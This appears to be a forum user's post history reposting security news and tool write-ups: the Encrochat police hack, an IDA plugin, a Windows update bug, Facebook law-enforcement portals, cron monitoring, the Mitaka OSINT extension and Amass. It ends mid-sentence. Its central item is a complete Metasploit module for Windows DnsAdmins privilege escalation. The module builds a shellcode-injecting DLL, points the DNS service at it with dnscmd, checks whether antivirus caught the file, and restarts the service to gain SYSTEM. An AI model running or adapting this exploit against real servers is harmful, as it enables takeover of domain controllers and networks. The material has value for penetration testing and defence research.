-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
A document obtained by Motherboard provides more detail on the malware law enforcement deployed against Encrochat devices. IMAGE: YOUTUBE The malware that French law enforcement deployed en masse onto Encrochat devices, a large encrypted phone network using Android phones, had the capability to harvest "all data stored within the device," and was expected to include chat messages, geolocation data, usernames, passwords, and more, according to a document obtained by Motherboard. The document adds more specifics around the law enforcement hack and subsequent takedown of Encrochat earlier this year. Organized crime groups across Europe and the rest of the world heavily used the network before its seizure, in many cases to facilitate large scale drug trafficking. The operation is one of, if not the, largest law enforcement mass hacking operation to date, with investigators obtaining more than a hundred million encrypted messages. "The NCA has been collaborating with the Gendarmerie on Encrochat for over 18 months, as the servers are hosted in France. The ultimate objective of this collaboration has been to identify and exploit any vulnerability in the service to obtain content," the document reads, referring to both the UK's National Crime Agency and one of the national police forces of France. As well as the geolocation, chat messages, and passwords, the law enforcement malware also told infected Encrochat devices to provide a list of WiFi access points near the device, the document reads. "This command from the implant will result in the JIT receiving the MAC address which is the unique number allocated to each Wi-Fi access point and the SSID which is the human readable name given to that access point," the document adds. A JIT is a joint investigation team, made up of various law enforcement bodies. Encrochat was a company that offered custom-built phones that sent end-to-end encrypted messages to one another. Encrochat took a base Android device, installed its own software, and physically removed the GPS, microphone, and camera functionality to lock down the devices further. These modifications may have impacted what sort of data the malware was actually able to obtain once deployed. Encrochat phones had a panic wipe feature, where if a user entered a particular PIN it would erase data stored on the device. The devices also ran two operating systems that sat side by side; one that appeared to be innocuous, and another that contained the users' more sensitive communications. In a previous email to Motherboard a representative of Encrochat said the firm is a legitimate company with clients in 140 countries, and that it sets out "to find the best technology on the market to provide a reliable and secure service for any organization or individual that want[s] to secure their information." The firm had tens of thousands of users worldwide, and decided to shut itself down after discovering the hack against its network. Encrochat's customers included a British hitman who assassinated a crime leader and an armed robber, and various violent gangs around Europe including those who used so-called "torture chambers." Some of the users may have been legitimate, however. Since the shutdown, police across Europe have arrested hundreds of alleged criminals who used the service. Motherboard previously obtained chat logs that prosecutors have presented as evidence against one drug dealer. Running an encrypted phone company is not typically illegal in-and-of-itself. The U.S. Department of Justice charged Vince Ramos, the CEO of another firm called Phantom Secure with racketeering conspiracy and other charges after an undercover investigation caught him saying the phones were made for drug trafficking. Phantom Secure started as a legitimate firm before catering more to the criminal market. Ramos was sentenced to nine years in prison in May 2019. French authorities said at the time of the Encrochat shutdown that they had legal authority to deploy the mass hack, which they described as a "technical tool." Via vice.com
-
- 2
-
print ("Welcome to", end = ' ') print ("RSTforums", end = '!')
-
Studying decompiler internals has never been so easy... Recently, we blogged about the Hex-Rays microcode that powers the IDA Pro decompiler. We showed how a few days spent hacking on the microcode API could dramatically reduce the cost of certain reverse engineering tasks. But developing for the microcode API can be challenging due to the limited examples to crib from, and the general complexity of working with decompiler internals. Today, we are publishing a developer-oriented plugin for IDA Pro called Lucid. Lucid is an interactive Hex-Rays microcode explorer that makes it effortless to study the optimizations of the decompilation pipeline. We use it as an aid for developing and debugging microcode-based augmentations. Lucid is a Hex-Rays microcode explorer for microcode plugin developers Usage Lucid requires IDA 7.5. It will automatically load for any architecture with a Hex-Rays decompiler present. Simply right click anywhere in a Pseudocode window and select View microcode to open the Lucid Microcode Explorer. Lucid adds a right click 'View microcode' context menu entry to Hex-Rays Pseudocode windows By default, the Microcode Explorer will synchronize with the last active Hex-Rays Pseudocode window. This can be toggled on / off in the ‘Settings’ groupbox of the explorer window. 'Basically Magic' Lucid’s advantage over the existing microcode explorers is that it is backed by a complete text-to-microcode structure mapping. This means that a cursor position in the rendered microcode text can be used to retrieve the underlying microinstruction, sub-instruction, or sub-operand under the user cursor (and vice versa). As the chief example, we use these mappings to help the explorer ‘project’ the user cursor through the layers, maintaining focus on the selected instruction or operand as it flows through the decompilation pipeline: Scrolling through the microcode maturity layers while tracking a specific operand At the end of the day, the intention is to provide more natural experiences for studying the microcode and developing related tooling. This is just one example of how we might ‘get there.’ Sub-instruction Graphs Lucid was originally created to serve as an interactive platform for lifting late-stage microcode expressions and generalizing them into ‘optimization’ patterns for the decompiler (think inline call detection/rewriting). While I am not sure I’ll find the time/motivation to revisit this area of research, Lucid does include a rudimentary feature (inspired by genmc) to view the sub-instruction tree of a given microinstruction which is still useful by itself. Viewing the sub-instruction tree of a given microinstruction You can view these individual trees by right clicking an instruction and selecting View subtree. Bits and Bobs The code for Lucid is available on github where it has been licensed permissively under the MIT license. As the initial release, the codebase is a bit messy and the README contains a few known issues/bugs at the time of publication. Finally, there is no regular development scheduled for this plugin (outside of maintenance) but I always welcome external contributions, issues, and feature requests. Conclusion In this post, we presented a new IDA Pro plugin called Lucid. It is a developer-oriented plugin designed to aid in the research and development of microcode-based plugins/extensions for the Hex-Rays decompiler. Our experience developing for these technologies is second to none. RET2 is happy to consult in these spaces, providing plugin development services, the addition of custom features to existing works, or other unique opportunities with regard to security tooling. If your organization has a need for this expertise, please feel free to reach out. Source
-
Mama si Tata, multi turisti de la cules capsuni vin acolo si scot bani, X (ori) nu i-au lasat sa plece In fine oricum e praf tot acolo, din spusele unor amici in alta ordine de idei cautati imagini, cam cate mui sunt publicate
-
^ n-auzi Pasarica ca a zguduit tot orasul, au exagerat cu TNT-ul, au ramas numai cateva cifre din serii, posibil sa fi fost atentat terorist, ipoteza asta nu ai luat-o in calcul?
-
This Metasploit module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ named ServerLevelPluginDll that can be made to point to an arbitrary DLL. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/compiler/windows' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Services include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation', 'Description' => %q{ This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended when using a UNC path. Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist, the DNS server on the target will not be able to restart. Similarly if a UNC share is not utilized, and users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key on the target computer may point to an nonexistant DLL, which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for this module for advice on how to resolve this issue should it occur. This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows Server version up to and including Windows Server 2019. }, 'References' => [ ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'], ['URL', 'https://adsecurity.org/?p=4064'], ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html'] ], 'DisclosureDate' => 'May 08 2017', 'License' => MSF_LICENSE, 'Author' => [ 'Shay Ber', # vulnerability discovery 'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module ], 'Platform' => 'win', 'Targets' => [[ 'Automatic', {} ]], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 20, 'EXITFUNC' => 'thread' }, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], # The service can go down if AV picks up on the file at an # non-optimal time or if the UNC path is typed in wrong. 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options( [ OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', 'msf.dll']), OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', '%TEMP%']), OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false]), OptInt.new('AVTIMEOUT', [true, 'Time to wait for AV to potentially notice the DLL file we dropped, in seconds.', 60]) ] ) deregister_options('FILE_CONTENTS') end def check if sysinfo['OS'] =~ /Windows 20(03|08|12|16\+|16)/ vprint_good('OS seems vulnerable.') else vprint_error('OS is not vulnerable!') return Exploit::CheckCode::Safe end username = client.sys.config.getuid user_sid = client.sys.config.getsid hostname = sysinfo['Computer'] vprint_status("Running check against #{hostname} as user #{username}...") srv_info = service_info('DNS') if srv_info.nil? vprint_error('Unable to enumerate the DNS service!') return Exploit::CheckCode::Unknown end if srv_info && srv_info[:display].empty? vprint_error('The DNS service does not exist on this host!') return Exploit::CheckCode::Safe end # for use during permission check if srv_info[:dacl].nil? vprint_error('Unable to determine permissions on the DNS service!') return Exploit::CheckCode::Unknown end dacl_items = srv_info[:dacl].split('D:')[1].scan(/\((.+?)\)/) vprint_good("DNS service found on #{hostname}.") # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll group_membership = get_whoami unless group_membership vprint_error('Unable to enumerate group membership!') return Exploit::CheckCode::Unknown end unless group_membership.include? 'DnsAdmins' vprint_error("User #{username} is not part of the DnsAdmins group!") return Exploit::CheckCode::Safe end # find the DnsAdmins group SID dnsadmin_sid = '' group_membership.each_line do |line| unless line.include? 'DnsAdmins' next end vprint_good("User #{username} is part of the DnsAdmins group.") line.split.each do |item| unless item.include? 'S-' next end vprint_status("DnsAdmins SID is #{item}") dnsadmin_sid = item break end break end # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service if dacl_items.any? { |dacl_item| dacl_item[0].include? dnsadmin_sid } dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? dnsadmin_sid }[0] if dnsadmin_dacl.include? 'RPWP' vprint_good('Members of the DnsAdmins group can start/stop the DNS service.') end elsif dacl_items.any? { |dacl_item| dacl_item[0].include? user_sid } user_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? user_sid }[0] if user_dacl.include? 'RPWP' vprint_good("User #{username} can start/stop the DNS service.") end else vprint_error("User #{username} does not have permissions to start/stop the DNS service!") return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit # get system architecture arch = sysinfo['Architecture'] if arch != payload_instance.arch.first fail_with(Failure::BadConfig, 'Wrong payload architecture!') end # no exploit, just create the DLL if datastore['MAKEDLL'] == true # copypasta from lib/msf/core/exploit/fileformat.rb # writes the generated DLL to ~/.msf4/local/ dllname = datastore['DLLNAME'] full_path = store_local('dll', nil, make_serverlevelplugindll(arch), dllname) print_good("#{dllname} stored at #{full_path}") return end # will exploit if is_system? fail_with(Failure::BadConfig, 'Session is already elevated!') end unless [CheckCode::Vulnerable].include? check fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') end # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll print_status('Checking service state...') svc_state = service_status('DNS') unless svc_state[:state] == 4 print_status('DNS service is stopped, starting it...') service_start('DNS') end # the service must be started before proceeding total_wait_time = 0 loop do svc_state = service_status('DNS') if svc_state[:state] == 4 sleep 1 break else sleep 2 total_wait_time += 2 fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90 end end # the if block assumes several things: # 1. operator has set up their own SMB share (SMB2 is default for most targets), as MSF does not support SMB2 yet # 2. operator has generated their own DLL with the correct payload and architecture # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or # the target falls back to SMB1 dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip if datastore['DLLPATH'].start_with?('\\\\') # Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. build_num_raw = session.shell_command_token('cmd.exe /c ver') build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/) if build_num.nil? print_error("Couldn't retrieve the target's build number!") return else build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0] vprint_status("Target's build number: #{build_num}") end build_num_gemversion = Gem::Version.new(build_num) # If the target is running Windows 10 or Windows Server versions with a # build number of 16299 or later, aka v1709 or later, then we need to check # if "Enable insecure guest logons" is enabled on the target system as per # https://support.microsoft.com/en-us/help/4046019/guest-access-in-smb2-disabled-by-default-in-windows-10-and-windows-ser if (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) # check if "Enable insecure guest logons" is enabled on the target system allow_insecure_guest_auth = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters', 'AllowInsecureGuestAuth') unless allow_insecure_guest_auth == 1 fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!") end end print_status('Using user-provided UNC path.') else write_file(dllpath, make_serverlevelplugindll(arch)) print_good("Wrote DLL to #{dllpath}!") print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...") sleep(datastore['AVTIMEOUT']) unless file_exist?(dllpath.to_s) print_error('Woops looks like the DLL got picked up by AV or somehow got deleted...') return end print_good("Looks like our file wasn't caught by the AV.") end print_warning('Entering danger section...') print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...") dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip unless dnscmd_result.include? 'success' fail_with(Failure::UnexpectedReply, dnscmd_result.split("\n")[0]) end print_good(dnscmd_result.split("\n")[0]) # restart the DNS service print_status('Restarting the DNS service...') restart_service end def on_new_session(session) if datastore['DLLPATH'].start_with?('\\\\') return else if session.type == 'meterpreter' session.core.use('stdapi') unless session.ext.aliases.include?('stdapi') end vprint_status('Erasing ServerLevelPluginDll registry value...') cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll") print_good('Exited danger zone successfully!') dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip restart_service('session' => session, 'dllpath' => dllpath) end end def restart_service(opts = {}) # for deleting the DLL if opts['session'] && opts['dllpath'] session = opts['session'] dllpath = opts['dllpath'] end service_stop('DNS') # see if the service has really been stopped total_wait_time = 0 loop do svc_state = service_status('DNS') if svc_state[:state] == 1 sleep 1 break else sleep 2 total_wait_time += 2 fail_with(Failure::TimeoutExpired, 'Was unable to stop the DNS service after 3 minutes of trying...') if total_wait_time >= 90 end end # clean up the dropped DLL if session && dllpath && !datastore['DLLPATH'].start_with?('\\\\') vprint_status("Removing #{dllpath}...") session.fs.file.rm dllpath end service_start('DNS') # see if the service has really been started total_wait_time = 0 loop do svc_state = service_status('DNS') if svc_state[:state] == 4 sleep 1 break else sleep 2 total_wait_time += 2 fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90 end end end def make_serverlevelplugindll(arch) # generate the payload payload = generate_payload # the C template for the ServerLevelPluginDll DLL c_template = %| #include <Windows.h> #include <stdlib.h> #include <String.h> BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int DnsPluginCleanup __attribute__((export))(void) { return 0; } int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; } int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) { STARTUPINFO startup_info; PROCESS_INFORMATION process_info; char throwaway_buffer[8]; ZeroMemory(&startup_info, sizeof(startup_info)); startup_info.cb = sizeof(STARTUPINFO); startup_info.dwFlags = STARTF_USESHOWWINDOW; startup_info.wShowWindow = 0; if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info)) { HANDLE processHandle; HANDLE remoteThread; PVOID remoteBuffer; unsigned char shellcode[] = "SHELLCODE_PLACEHOLDER"; processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId); remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE); WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL); remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(process_info.hThread); CloseHandle(processHandle); } return 0; } | c_template.gsub!('SHELLCODE_PLACEHOLDER', Rex::Text.to_hex(payload.raw).to_s) cpu = nil case arch when 'x86' cpu = Metasm::Ia32.new when 'x64' cpu = Metasm::X86_64.new else fail_with(Failure::NoTarget, 'Target arch is not compatible') end print_status('Building DLL...') Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu) end end Source
-
- 1
-
The Windows 10 KB4571756 security update released yesterday is reportedly breaking Microsoft's Windows Subsystem for Linux 2 (WSL2) compatibility layer. This issue prevents Windows 10 2004 users from launching the Windows Terminal with WSL2, with the app crashing and throwing "Element not found" and "Process exited with code 4294967295" errors. Microsoft is yet to officially acknowledge this issue, but the number of reports coming from users that the error goes away after the update is uninstalled indicates that the Windows 10 2004 KB4571756 update is the one responsible. KB4571756 is a security update issued yesterday as part of the August 2020 Patch Tuesday release to address vulnerabilities in multiple Windows components and to deliver a number of improvements and fixes. With yesterday's security updates, Microsoft has also addressed two denial of service vulnerabilities (CVE-2020-0890 and CVE-2020-0904) affecting Windows Hyper-V — the company's native hypervisor for creating virtual machines and a component also used by WSL2. To install KB4571756, you can either check for updates via Windows Update or manually download it from the Microsoft Update Catalog. Admins can also distribute the update to enterprise endpoints using Windows Server Update Services (WSUS). On devices where automatic updates are enabled, KB4571756 will install automatically and you do not have to take any further actions. How to fix: uninstall the KB4571756 update Microsoft has not yet formally acknowledged the issue (no new support document has been published and no new known issues have been added to the Windows 10 health dashboard with info on this user reported problem). While an official fix for the problem is not yet available, luckily, according to affected Windows 10 users have found that uninstalling KB4571756 will restore WSL2 functionality. Before uninstalling the KB4571756 Cumulative Update, you should know that you would also remove mitigation for multiple security issues impacting your Windows 10 device. For those who are experiencing crashing problems when launching Windows Terminal with WSL2 after installing the KB4571756, the only way to resolve them at this time is to manually uninstall it. Microsoft says in the updates' details from the Update Catalog that it can be removed "by selecting View installed updates in the Programs and Features Control Panel." If you are willing to exchange a security downgrade over functional WSL2, you can follow these steps to uninstall the KB4571756 update: Select the start button or Windows Desktop Search and type update history and select View your Update history. On the Settings/View update history dialog window, Select Uninstall Updates. On the Installed Updates dialog window, find and select KB4571756, and then click the Uninstall button. Restart your Windows device. We also have a tutorial on how to uninstall, pause, or block Windows updates if they are causing issues after installing. BleepingComputer has reached out to Microsoft for comment but had not heard back at the time of this publication. Source
-
Facebook has chosen to review user data requests manually, without screening the email address of people who request access to the portals, which are made for law enforcement agents only. Anyone with an email address can get into Facebook and WhatsApp law enforcement portals, designed for law enforcement agents to file requests for user data. Getting into the two portals doesn't grant people access to any user information, nor any sensitive information about the company. But the portals are not designed to filter email addresses in any way, leaving the door open to spammers to freely access the portals and send fake requests. Last week, security researcher Jacob Riggs discovered that he could get access to the two portals with any email address. All he needed to do was enter his email address, submit it to the portals, and then click on a confirmation link he received in his inbox. Once he did that, he could request records using the forms below. A SCREENSHOT OF FACEBOOK'S PORTAL FOR LAW ENFORCEMENT AGENTS TO REQUEST USER DATA. (IMAGE: JACOB RIGGS) A SCREENSHOT OF WHATSAPP'S PORTAL FOR LAW ENFORCEMENT AGENTS TO REQUEST USER DATA. (IMAGE: JACOB RIGGS) Motherboard was able to reproduce Rigg's findings. Riggs reported the issue to Facebook, thinking it was due to a design flaw that needed to be fixed. Facebook, however, told Riggs and Motherboard that this was a feature, not a bug. The spokesperson added that the system does reject some email domains and has other rules to prevent spam. In other words, Facebook prefers to let anyone submit a request and then check that it's real and legal, rather than block them with an automated system or require agents to register. In any case, both Facebook and Instagram's portals include a note to discourage potential spammers, warning them that only "governmental entities authorized to obtain evidence in connection with official legal proceedings" can file requests. Google's law enforcement portal, for comparison, only allows "verified" law enforcement agents to submit user data, according to the company's site. In fact, Riggs could not get into the Google portal using his personal email address. Tech companies routinely receive and process legitimate data requests through these portals. In its latest transparency report, which includes data requests for Facebook, Facebook Messenger, Instagram, WhatsApp, and Oculus, and which covers the last six months of 2019, the company revealed that it had received 140,875 requests for user data. Source
-
- 2
-
Nobody wants to be notified by email anymore, especially if its a failed cron job. We have advanced monitoring systems that tell if somethings wrong. In my case I use Grafana and Prometheus and Node exporter to collect host metric, visualize them and send out alerts. Usually, one would set up an exporter to monitor an new piece of software, but for cron there isn’t any exporter available. In contraire there are a lot of online service to monitor your cron jobs, such as Cronitor.io. But we do not want to add another dependency for simply monitoring cron jobs. In this tutorial I will elaborate on how I look after cron jobs with Prometheus and Grafana. We are going to configure the textfile collector of the Node exporter, define custom metrics and visualize them in a Grafana dashboard. I assume that there is machine running with cron jobs. This machine has multiple cron jobs and a configured Node exporter. The Node metrics are scrapped by Prometheus and visualized in Grafana. First, we are going to add a bash script to write custom Node exporter metrics. Copy the script below to the host. /usr/local/bin/write-node-exporter-metric #!/bin/bash # Display Help Help() { echo echo "write-node-exporter-metric" echo "##########################" echo echo "Description: Write node-exporter metric." echo "Syntax: write-node-exporter-metric [-n|-c|-v|help]" echo "Example: write-node-exporter-metric -n cron_job -c \"Renew certs for proxy01\" -v 0" echo "options:" echo " -n Reference of custom metric type. Defaults to 'cron_job'" echo " -c Code for metric value." echo " -v Value of metric." echo " help Show write-node-exporter-metric help." echo } # Show help and exit if [[ $1 == 'help' ]]; then Help exit fi # Process params while getopts ":n :c: :v:" opt; do case $opt in n) TYPE="$OPTARG" ;; c) CODE="$OPTARG" ;; v) VALUE="$OPTARG" ;; \?) echo "Invalid option -$OPTARG" >&2 Help exit;; esac done # Fallback to environment vars and default values : ${TYPE:='cron_job'} [[ -z "$CODE" ]] && { echo "Parameter -c|code is empty" ; exit 1; } [[ -z "$VALUE" ]] && { echo "Parameter -v|value is empty" ; exit 1; } if [ "$TYPE" == "cron_job" ]; then echo "Write metric node_cron_job_exit_code for code \"$CODE\"." ID=$(echo $CODE | shasum | cut -c1-5) cat << EOF >> /var/tmp/node_cron_job_exit_code.$ID.prom.$$ # HELP node_cron_job_exit_code Last exit code of cron job. # TYPE node_cron_job_exit_code counter node_cron_job_exit_code{code="$CODE"} 0 EOF mv /var/tmp/node_cron_job_exit_code.$ID.prom.$$ /var/tmp/node_cron_job_exit_code.$ID.prom fi And make it executable. chmod +x /usr/local/bin/write-node-exporter-metric By default this script writes metric text files to /var/tmp. This folder is watched by Node exporter. Set the textfile collector directory flag --collector.textfile.directory for the Node exporter. If you are using Docker to run the exporter, set the following config: ... volumes: - /:/hostfs command: '--collector.textfile.directory=/hostfs/var/tmp' ... Let’s write a custom metric and see if it scrapped by Prometheus. Run write-node-exporter-metric -c 'Renew certs for proxy01' -v 0 on the command line. Check the metrics interface of the host and search for node_cron_job_exit_code. Use this curl command if you want to stick to the console: curl --silent --user username:password \ https://host.example.com/node-exporter/metrics | \ grep node_cron_job_exit_code If the value has been exposed, open Grafana and explore the metrics. Create a new panel and use this query: sum by (instance) (node_cron_job_exit_code) This query sums all cron jobs exit codes by instance. If the sum is not null something went wrong. Create an alert that triggers if the metric is greater than 0. When setting up cron jobs crontab -e from now on you simply have to add the write metric command at end of the line. Here is an example: 45 0 * * 0 /usr/share/cerbot/renew-certs; write-node-exporter-metric -c 'Renew certs for proxy' -v $? No matter if the job succeeds or fails, the exit code is written and forwarded to Prometheus. What do you think? Do you like this solution? Let me know how you monitor cron jobs. Source
-
Web browser extensions are one of the simplest ways to get starting using open-source intelligence tools because they're cross-platform. So anyone using Chrome on Linux, macOS, and Windows can use them all the same. The same goes for Firefox. One desktop browser add-on, in particular, makes OSINT as easy as right-clicking to search for hashes, email addresses, and URLs. Mitaka, created by Manabu Niseki, works in Google Chrome and Mozilla Firefox. Once installed, it lets you select and inspect certain pieces of text and indicators of compromise (IoC), running them through a variety of different search engines, all with just a few clicks. The tool can help investigators identify malware, determine the credibility of an email address, and see if a URL is associated with anything sketchy, to name just a few things. Installing Mitaka in Your Browser If you've ever installed a browser extension before, you know what to do. Even if not, it couldn't be easier. Just visit Mitaka in either the Chrome Web Store or Firefox Add-Ons, hit "Add to Chrome" or "Add to Firefox," then select "Add" to verify. Mitaka: Chrome Extension | Firefox Add-On Then, once you've found something of interest on a website or in an email that you're investigating, all you need to do is highlight and right-click it, then look through all of the options Mitaka provides in the contextual menu. On the GitHub page for Mitaka, there are a few examples worth trying out to see how well Mitake works. Example 1 Inspecting Email Addresses Whenever you see an email address that you suspect is malicious, whether it's defanged (obfuscated so it can't be clicked) or clickable, you can highlight it, right-click it, then choose "Mitaka." If it's defanged, which usually means putting in [.] where regular periods go to break up the link, Mitaka will rearm it so that any search you perform will still work. In the Mitaka menu, you'll see a variety of tools you can use to inspect and investigate the email address. There are searches you can perform on Censys, PublicWWW, DomainBigData, DomainWatch, EmailRep, IntelligenceX, OCCPR, RiskIQ, SecurityTrails, ThreatConnect, ThreatCrowd, and ViewDNS. For example, if you want to learn its email reputation, choose "Search this email on EmailRep." From the results, we can see that test@example.com is probably not one we should trust. In fact, we can see from this report that it's been blacklisted and flagged for malicious activity. So, if we were to find or receive an email address that had been flagged this way, we would be able to very quickly determine that it was associated with somebody who was blacklisted for malware, or possibly something like phishing, and that would be an excellent way to identify a risky sender or user. Conversely, let's say we're looking through a breach of different people's passwords, and we want to identify whether or not a real person owns an email address. We can take a properly formed email address, right-click it, select "Mitaka," then use the same EmailRep tool to check. From a report, we can assume that it's probably a real person because the email address has been seen in 27 reputable sources on the internet, including Vimeo, Pinterest, and Aboutme. In the code, we can see all of the information about the different types of high-quality profiles that are linked to the email address, which further legitimizes the account as real. Example 2 Performing Malware Analysis on Files Malware analysis is another exciting tool in Mitaka's arsenal. Let's say that we're on a website, and we have a file that we want to download. We've heard of the tool before, it looks reputable, and the web app seems good. Once we download the file, we can compare the hash to the one listed on the site. If the hash matches, we know we downloaded the file the site's author intended, but how do we know that the file is really OK? If a virus scanner doesn't catch it on the computer, you can always take the hash of the file that's on the website, right-click it, choose "Mitaka," then use something like VirusTotal. This scanner can identify potentially suspicious files by looking at the hash and trying to find out whether or not it could harm your computer. In our case, we can see that there are multiple detections and that this is a macOS crypto miner. So if we had run this on our computer, even though it's undetected by Avast and a bunch of other different, pretty reputable malware scanners, it still would have gotten through. So, as you can see, Mitaka is a pretty effective way of checking to see if a file you encounter on the web has been flagged for doing something bad using tools like VirusTotal or another data source. Available from the menu for this kind of search is Censys, PublicWWW, ANY.RUN, Apklab, Hashdd, HybridAnalysis, InQuest, Intezer, JoeSandbox, MalShare, Maltiverse, MalwareBazaar, Malwares, OpenTIP, OTX, Pulsedive, Scumware, ThreatMiner, VirusTotal, VMRay, VxCube, and X-Force-Exchange. Example 3 Checking to See if a Site Is Sketchy Now, we can also do URL searches with Mitaka. If we're looking at a big data dump, or if we just want to see if a particular URL on a webpage or email has been identified with something sketchy, we can right-click the link, choose "Mitaka," then select from one of the tools. Available tools for this kind of search include Censys, PublicWWW, BinaryEdge, crt.sh, DNSlytics, DomainBigData, DomainTools, DomainWatch, FOFA, GoogleSafeBrowsing, GreyNoise, Hashdd, HurricaneElectric, HybridAnalysis, IntelligenceX, Maltiverse, OTX, Pulsedive, RiskIQ, Robtex, Scumware, SecurityTrails, Shodan, SpyOnWeb, Spyse, Talos, ThreatConnect, ThreatCrowd, ThreatMiner, TIP, URLhaus, Urlscan, ViewDNS, VirusTotal, VxCube, WebAnalyzer, and X-Force-Exchange. For our test, let's just check on Censys. In our case, the domain we searched is associated with some pretty sketchy stuff. Because we can see that it's being used for poor lookups and all sorts of other worrisome activities, we can assume that it's probably not a domain that's owned by a corporation or company that is more straightforward with its dealings. This is just someone looking to make as much money as they can off of the web space that they have. We can also see that it uses an Amazon system, which means that it's probably just a rented system and not actually someone's physical setup. All of this data points to the fact that this would be a very sketchy website to do business with and may not be as legitimate as you'd like. There's a Lot More to Explore! Those were all pretty basic use-cases, but as you can see, there are a ton of different ways we can investigate a clue on the internet using a simple right-click menu. One thing that is really cool about Mitaka is that it's able to detect different types of data so that the contextual search options can cater to the right information. This was just a quick overview. If you want to get started with Mitaka, you should go through all the different data types, highlight something on a website or email, then right-click and choose your Mitaka search. There is a lot of available sources, and it can be overwhelming at first, but that just means Mitaka is a valuable tool with tons of helpful searches available at the tip of your finger. Source
-
- 1
-
Throughout history, human beings have crafted tools as a way to improve people’s lives. From stone hammers to metal knives, through advancements from rudimentary medical instruments to breakthroughs made with industrial steam machinery. From the disruption of transistors and the computer era through today’s technology that seems to come straight out of science fiction, like the storage of data in DNA, tools at the very least allow us to get more work done. Tools afford us time and efficiency, and the security industry is no exception. Security tools are like what optical illusion is for magicians: they yield impressive results in brief periods of time, with a great impact on your audience. These digital instruments open multiple doors to a world of information that would otherwise be difficult to perceive. Today we’re introducing you to Amass, a true information-gathering ‘swiss army knife’ for your command line tool box. It was originally written by Jeff Foley (currently the Amass Project Leader) and later adopted by the OWASP Foundation. What is Amass? Amass is an open source network mapping and attack surface discovery tool that uses information gathering and other techniques such as active reconnaissance and external asset discovery to scrap all the available data. In order to accomplish this, it uses its own internal machinery and it also integrates smoothly with different external services to increase its results, efficiency and power. This tool maintains a strong focus on DNS, HTTP and 